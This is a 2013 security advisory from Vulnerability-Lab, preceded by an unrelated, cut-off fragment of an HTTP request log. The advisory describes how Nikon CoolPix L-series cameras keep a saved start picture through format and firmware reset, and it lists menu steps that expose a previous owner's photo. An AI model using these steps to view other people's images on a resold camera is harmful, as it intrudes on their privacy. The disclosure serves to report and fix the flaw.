http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0 Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[506] Mime Type[text/plain] Request Headers: Host[192.168.2.104:41495] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html, */*; q=0.01] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type= child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06: 26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200] Content-Length[87] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Da
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue
Title: == Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue Date: = 2013-07-16 References: === http://www.vulnerability-lab.com/get_content.php?id=1014 VL-ID: = 1014 Common Vulnerability Scoring System: 3.5 Introduction: = Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 & 25 is clever with images—so you don’t have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing. (Copy of the Vendor Homepage: http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27 ) Abstract: = The Vulnerability Laboratory Research Team discovered a information disclosure issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0. Report-Timeline: 2013-07-16:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Nikon Product: COOLPIX L25 L27 & L28 Exploitation-Technique: === Hardware Severity: = Medium Details: An information disclosure issue is detected in the official Nikons Camera L Series 25, 28 & maybe others. The information disclosure bug allows remote attackers to access sensitive information of other people, websites, servers or companies. The privacy issue is located in the menu > system module when processing to save a start bild (start picture) when processing to boot the camera system. The camera allows to save a start bild (start picture) and does not remove it when processing to perform a format or firmware reset. People can access the device to watch in the short review of the start bild (start picture) the earlier deleted pictures. The device does not recognize it and stored the pictures without the possibility to delete. In a scenario on eBay we bought from a private seller a nikon camera. He uses the camera about 2 years for his holiday trips and conferences. He recognized in a mail the camera got a format and firmware reset. When the camera arrived at our location we was watching the into short review of the start bild (start picture) and saw several images of the owner. Proof of Concept: = The information disclosure issue can be reproduced by local attackers with physical camera device access. Steps to reproduce ... 1. Start the Nikon L series camera 2. Go in the camera screen mode and take a nice picture 3. Go to System > Start Bild 4. Choose your own picture and save it as start picture 5. Now shutdown the camera the regular way and start it again after some secounds 6. The image of us will be visible when the system boots 7. When go to the Menu go to System and format the device 8. Go to Menu again and switch to System 9. After the format we now reset the device 10. Shutdown the Nikon Camera and take out the sd card of course 11. Restart it and go to the menu, open the start bild (start picture) module 12. Now the image of us is visible even but we did a full hardware reset or format 13. Information Disclosure issue in Nikon L Series successful reproduced! Note: When the image is saved in the camera as start picture, no format & no firmware reset can remove it anymore. Solution: = To fix the vulnerability remove with the firmware reset or format all pictures from the review menu. Risk: = The security risk of the information disclosure issue is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerabili